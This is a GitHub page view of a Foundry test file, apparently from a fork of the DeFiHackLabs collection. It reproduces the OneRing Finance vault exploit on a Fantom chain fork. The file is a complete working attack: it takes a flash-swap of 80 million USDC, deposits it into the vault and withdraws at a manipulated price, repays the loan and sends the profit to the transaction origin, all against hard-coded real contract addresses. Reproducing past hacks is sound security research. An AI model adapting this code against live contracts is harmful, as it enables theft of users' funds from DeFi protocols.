forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
OneRing_exp.sol
30 lines (25 loc) · 1.31 KB
/
OneRing_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IUniswapV2Pair pair = IUniswapV2Pair(0xbcab7d083Cf6a01e0DdA9ed7F8a02b47d125e682);
IERC20 usdc = IERC20(0x04068DA6C83AFCFA0e13ba15A6696662335D5B75);
IOneRingVault vault = IOneRingVault(0x4e332D616b5bA1eDFd87c899E534D996c336a2FC);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("fantom", 34_041_499); //fork fantom at block 34041499
}
function testExploit() public {
emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
pair.swap(80_000_000 * 1e6, 0, address(this), new bytes(1));
emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
}
function hook(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
usdc.approve(address(vault), type(uint256).max);
vault.depositSafe(amount0, address(usdc), 1);
vault.withdraw(vault.balanceOf(address(this)), address(usdc));
usdc.transfer(msg.sender, (amount0 / 9999 * 10_000) + 10_000);
usdc.transfer(tx.origin, usdc.balanceOf(address(this)));
}
}